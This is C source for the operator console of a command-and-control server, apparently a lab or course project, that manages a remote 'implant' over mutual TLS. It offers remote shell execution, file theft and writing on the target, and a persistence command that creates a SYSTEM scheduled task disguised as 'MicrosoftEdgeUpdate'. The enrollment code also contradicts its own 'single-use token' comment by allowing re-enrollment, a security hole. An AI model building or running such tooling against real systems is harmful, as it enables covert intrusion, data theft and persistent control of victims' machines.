#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <string.h>
#include <stdlib.h>

#include "protocol.h"
#include "tls.h"
#include "controller_utils.h"

/* ── Cert / key paths inside the Docker container ────────────────────
 * Mounted from the host at runtime via docker-compose volumes:
 *   ./certs:/opt/c2/certs:ro
 * Generated by launch.sh → generate_certs.sh each run.               */
#define TLS_CERT_FILE  "certs/controller.crt"
#define TLS_KEY_FILE   "certs/controller.key"
#define TLS_CA_FILE    "certs/ca.crt"

/*
 * BP4 — serial whitelist.
 * One hex serial per line.  Generated alongside the implant cert by
 * generate_certs.sh.  Revoke a burned implant by removing its line and
 * running docker compose up --build c2-server.
 */
#define TLS_WHITELIST    "certs/whitelist.txt"
/* BP2: CA key for signing enrollment CSRs */
#define TLS_CA_KEY_FILE  "certs/ca.key"

#define PERSISTENCE_UNKNOWN   -1
#define PERSISTENCE_DISABLED   0
#define PERSISTENCE_ENABLED    1

#define PERSISTENCE_TASK_NAME "MicrosoftEdgeUpdate"
#define PERSISTENCE_TASK_CMD  "C:\\Users\\Public\\i.exe"
#define PERSISTENCE_CHECK_CMD \
    "schtasks /query /tn \"MicrosoftEdgeUpdate\" >nul 2>&1 && echo TASK_EXISTS || echo TASK_MISSING"
#define PERSISTENCE_CREATE_CMD \
    "schtasks /create /tn \"MicrosoftEdgeUpdate\" /tr \"C:\\Users\\Public\\i.exe\" /sc ONLOGON /ru SYSTEM /rl HIGHEST /f"

/* Returns 0 on success, -1 if connection was lost.
 * Does NOT free conn — the outer loop owns conn's lifetime. */
static int process_response(Packet *response, int request_id, Conn *conn)
{
    (void)conn; /* conn is kept here in case callers need it for context */

    if (response == NULL) {
        printf("Connection lost.\n\n");
        return -1;
    }

    if (response->request_id != request_id) {
        printf("ERROR: request ID mismatch, expected %d got %d\n",
               request_id, response->request_id);
        free_packet(response);
        return -1;
    }

    print_packet_contents(response);
    free_packet(response);
    return 0;
}

static void display_header(int persistence)
{
    const char *status;
    if (persistence == PERSISTENCE_ENABLED)
        status = "ENABLED ";
    else if (persistence == PERSISTENCE_DISABLED)
        status = "DISABLED";
    else
        status = "UNKNOWN ";

    printf("+------------------------------------+\n");
    printf("| %-34s |\n", "C2 Controller");
    printf("| Persistence: %-21s |\n", status);
    printf("+------------------------------------+\n");
}

static void display_prompt(int persistence)
{
    display_header(persistence);
    printf("Select a command:\n");
    printf("  1 - HEARTBEAT                  Check implant is alive\n");
    printf("  2 - SET_SLEEP                  Make implant sleep N seconds\n");
    printf("  3 - SHUTDOWN    (removes implant + task)\n");
    printf("  4 - READ_DATA                  Read a file from the target\n");
    printf("  5 - WRITE_DATA                 Write a file to the target\n");
    printf("  6 - RUN_CMD                    Execute a shell command\n");
    printf("  7 - ENABLE PERSISTENCE         Create scheduled task on target\n");
    printf("> ");
    fflush(stdout);
}

static int console_input(int persistence)
{
    int choice;
    while (1) {
        char input_buffer[32];
        display_prompt(persistence);

        if (fgets(input_buffer, sizeof(input_buffer), stdin) == NULL) {
            printf("\nInput error. Try again.\n");
            continue;
        }

        if (strchr(input_buffer, '\n') == NULL)
            flush_stdin();

        if ((sscanf(input_buffer, "%d", &choice) == 1) &&
            (choice >= 1 && choice <= 7))
            break;

        printf("INVALID INPUT! Please enter an integer from 1-7.\n");
    }
    return choice;
}

static char *parameters_input(const char *display_message)
{
    char *input = malloc(256);
    printf("%s", display_message);
    fgets(input, 256, stdin);

    if (strchr(input, '\n') == NULL)
        flush_stdin();

    input[strcspn(input, "\n")] = '\0';
    return input;
}

/* Send RUN_CMD and return the response. Returns NULL on connection loss. */
static Packet *run_cmd_raw(const char *cmd, int *request_id, Conn *conn)
{
    (*request_id)++;
    Packet packet = {COMMAND_RUN_CMD, *request_id, (int)strlen(cmd), (char *)cmd};
    send_packet(&packet, conn);
    return recieve_packet(conn);
}

/* Auto-detect scheduled task immediately after HELLO. */
static int detect_persistence(int *request_id, Conn *conn)
{
    Packet *response = run_cmd_raw(PERSISTENCE_CHECK_CMD, request_id, conn);
    if (response == NULL)
        return PERSISTENCE_UNKNOWN;

    int result = PERSISTENCE_UNKNOWN;
    if (response->payload != NULL) {
        if (strstr(response->payload, "TASK_EXISTS"))
            result = PERSISTENCE_ENABLED;
        else if (strstr(response->payload, "TASK_MISSING"))
            result = PERSISTENCE_DISABLED;
    }
    free_packet(response);
    return result;
}

int main(int argc, char *argv[])
{
    (void)argc; (void)argv;

    /* ── BP1: init mTLS server context ──────────────────────────────── */
    tls_init_server(TLS_CERT_FILE, TLS_KEY_FILE, TLS_CA_FILE);

    /* ── TCP listener ────────────────────────────────────────────────── */
    int server_fd = socket(AF_INET, SOCK_STREAM, 0);
    if (server_fd < 0) { perror("socket"); return 1; }

    int opt = 1;
    setsockopt(server_fd, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(opt));

    int port = 4444;
    const char *env_port = getenv("C2_PORT");
    if (env_port && env_port[0] != '\0') {
        int p = atoi(env_port);
        if (p > 0) port = p;
    }

    struct sockaddr_in addr;
    memset(&addr, 0, sizeof(addr));
    addr.sin_family      = AF_INET;
    addr.sin_port        = htons(port);
    addr.sin_addr.s_addr = INADDR_ANY;

    if (bind(server_fd, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        perror("bind"); close(server_fd); return 1;
    }
    if (listen(server_fd, 2) < 0) {
        perror("listen"); close(server_fd); return 1;
    }

    printf("<Controller listening on port %d (mTLS)>\n\n", port);

    /* BP2: single-use enrollment token — prevent re-enrollment after use */
    int g_token_used = 0;

    /* ── Outer loop: accept → mTLS/enroll → command loop → re-accept ── */
    while (1) {
        printf("<Waiting for implant...>\n\n");
        fflush(stdout);

        struct sockaddr_in client_addr;
        socklen_t client_len = sizeof(client_addr);
        int raw_fd = accept(server_fd,
                            (struct sockaddr *)&client_addr, &client_len);
        if (raw_fd < 0) { perror("accept"); continue; }

        /* ── BP1: perform TLS handshake ─────────────────────────────── */
        printf("<TCP connection from %s — performing mTLS handshake...>\n\n",
               inet_ntoa(client_addr.sin_addr));
        fflush(stdout);

        Conn *conn = tls_server_wrap(raw_fd);
        if (conn == NULL) {
            printf("<TLS handshake failed — dropping connection>\n\n");
            close(raw_fd);
            continue;
        }

        /* ── BP2: enrollment vs normal mTLS ─────────────────────────── */
        if (!tls_has_client_cert(conn)) {
            /* No client cert — this is an enrollment request */
            if (g_token_used) {
                printf("<Enrollment request received for consumed token — allowing re-enrollment>\n\n");
                /* We don't return/continue here; we allow the enrollment to proceed
                 * to help "unstick" implants that lost their credentials. */
            }

            Packet *pkt = recieve_packet(conn);
            if (!pkt || pkt->command_type != COMMAND_ENROLL_CSR) {
                printf("<Enrollment rejected — expected ENROLL_CSR packet>\n\n");
                if (pkt) free_packet(pkt);
                tls_conn_free(conn);
                continue;
            }

            const char *expected_token = getenv("ENROLLMENT_TOKEN");
            char *cert_pem = NULL;
            int   cert_len = 0;
            int ok = tls_sign_csr(pkt->payload, pkt->payload_len,
                                   TLS_CA_FILE, TLS_CA_KEY_FILE,
                                   expected_token, TLS_WHITELIST,
                                   &cert_pem, &cert_len);
            free_packet(pkt);

            if (ok) {
                g_token_used = 1;
                Packet resp = {COMMAND_ENROLL_CERT, 0, cert_len, cert_pem};
                send_packet(&resp, conn);
                free(cert_pem);
                printf("<Enrollment OK — cert issued, token consumed>\n\n");
                fflush(stdout);
            } else {
                printf("<Enrollment failed — CSR validation error>\n\n");
                fflush(stdout);
            }
            tls_conn_free(conn);
            continue;
        }

        /* ── BP4: serial whitelist check ────────────────────────────── */
        if (!tls_whitelist_check(conn, TLS_WHITELIST)) {
            printf("<Implant cert not in whitelist — rejecting>\n\n");
            tls_conn_free(conn);
            continue;
        }

        printf("<mTLS handshake OK — waiting for HELLO...>\n\n");
        fflush(stdout);

        /* ── Expect HELLO ────────────────────────────────────────────── */
        Packet *hello = recieve_packet(conn);
        if (hello == NULL || hello->command_type != COMMAND_HELLO) {
            printf("Unexpected initial packet. Dropping connection.\n\n");
            if (hello) free_packet(hello);
            tls_conn_free(conn);
            continue;
        }
        print_packet_contents(hello);
        free_packet(hello);

        int request_id = 0;

        printf("<Checking persistence status...>\n\n");
        fflush(stdout);
        int persistence = detect_persistence(&request_id, conn);

        int connected = 1;

        /* ── Inner loop: command dispatch until connection drops ─────── */
        while (connected) {
            int choice = console_input(persistence);

            switch (choice) {
            case COMMAND_HEARTBEAT: {
                request_id++;
                Packet pkt = {COMMAND_HEARTBEAT, request_id, 0, NULL};
                send_packet(&pkt, conn);
                Packet *resp = recieve_packet(conn);
                if (process_response(resp, request_id, conn) == -1)
                    connected = 0;
                break;
            }

            case COMMAND_READ_DATA: {
                char *path = parameters_input("Enter the path to file to read: ");
                request_id++;
                Packet pkt = {COMMAND_READ_DATA, request_id, (int)strlen(path), path};
                send_packet(&pkt, conn);
                free(path);
                Packet *resp = recieve_packet(conn);
                if (process_response(resp, request_id, conn) == -1)
                    connected = 0;
                break;
            }

            case COMMAND_WRITE_DATA: {
                char *path = parameters_input("Enter the path to file to write to: ");
                char *data = parameters_input("Enter the data to write: ");
                int path_len  = (int)strlen(path);
                int data_len  = (int)strlen(data);
                int total     = 4 + path_len + data_len;
                char *payload = malloc(total);
                memcpy(payload,              &path_len, 4);
                memcpy(payload + 4,          path,      path_len);
                memcpy(payload + 4 + path_len, data,    data_len);
                request_id++;
                Packet pkt = {COMMAND_WRITE_DATA, request_id, total, payload};
                send_packet(&pkt, conn);
                free(path); free(data); free(payload);
                Packet *resp = recieve_packet(conn);
                if (process_response(resp, request_id, conn) == -1)
                    connected = 0;
                break;
            }

            case COMMAND_RUN_CMD: {
                char *cmd = parameters_input("Enter command to run: ");
                request_id++;
                Packet pkt = {COMMAND_RUN_CMD, request_id, (int)strlen(cmd), cmd};
                send_packet(&pkt, conn);
                free(cmd);
                Packet *resp = recieve_packet(conn);
                if (process_response(resp, request_id, conn) == -1)
                    connected = 0;
                break;
            }

            case COMMAND_SET_SLEEP: {
                char *s = parameters_input("Enter the time to sleep in seconds: ");
                int   n = atoi(s);
                free(s);
                char *payload = malloc(4);
                memcpy(payload, &n, 4);
                request_id++;
                Packet pkt = {COMMAND_SET_SLEEP, request_id, 4, payload};
                send_packet(&pkt, conn);
                free(payload);

                Packet *resp = recieve_packet(conn);
                if (process_response(resp, request_id, conn) == -1) {
                    connected = 0;
                    break;
                }

                /* Implant will reconnect after sleeping — wait for it */
                printf("<Waiting for implant to reconnect after sleep...>\n\n");
                fflush(stdout);
                tls_conn_free(conn);
                conn = NULL;

                struct sockaddr_in ra;
                socklen_t rl = sizeof(ra);
                int new_raw = accept(server_fd, (struct sockaddr *)&ra, &rl);
                if (new_raw < 0) { perror("accept"); connected = 0; break; }

                conn = tls_server_wrap(new_raw);
                if (!conn) {
                    printf("<TLS handshake failed on reconnect>\n\n");
                    close(new_raw); connected = 0; break;
                }
                if (!tls_whitelist_check(conn, TLS_WHITELIST)) {
                    printf("<Reconnect cert not whitelisted — dropping>\n\n");
                    tls_conn_free(conn); conn = NULL; connected = 0; break;
                }

                Packet *rehello = recieve_packet(conn);
                if (process_response(rehello, 0, conn) == -1) {
                    conn = NULL; connected = 0; break;
                }
                request_id = 0;
                break;
            }

            case COMMAND_SHUTDOWN: {
                request_id++;
                Packet pkt = {COMMAND_SHUTDOWN, request_id, 0, NULL};
                send_packet(&pkt, conn);
                Packet *resp = recieve_packet(conn);
                process_response(resp, request_id, conn);
                tls_conn_free(conn); conn = NULL;
                tls_cleanup();
                close(server_fd);
                return 0;
            }

            case 7: { /* ENABLE PERSISTENCE */
                if (persistence == PERSISTENCE_ENABLED) {
                    printf("Persistence is already enabled.\n\n");
                    break;
                }
                printf("<Creating scheduled task on implant...>\n\n");
                fflush(stdout);
                Packet *resp = run_cmd_raw(PERSISTENCE_CREATE_CMD,
                                           &request_id, conn);
                if (resp == NULL) { connected = 0; break; }
                if (resp->payload && strstr(resp->payload, "SUCCESS")) {
                    persistence = PERSISTENCE_ENABLED;
                    printf("<Persistence ENABLED — task '%s' created.>\n\n",
                           PERSISTENCE_TASK_NAME);
                } else {
                    printf("<Failed to create scheduled task.>\n\n");
                }
                free_packet(resp);
                break;
            }

            default:
                break;
            }
        }

        /* Connection dropped — free TLS resources and re-accept */
        if (conn) { tls_conn_free(conn); conn = NULL; }
        printf("<Connection lost. Waiting for implant to reconnect...>\n\n");
        fflush(stdout);
    }
}
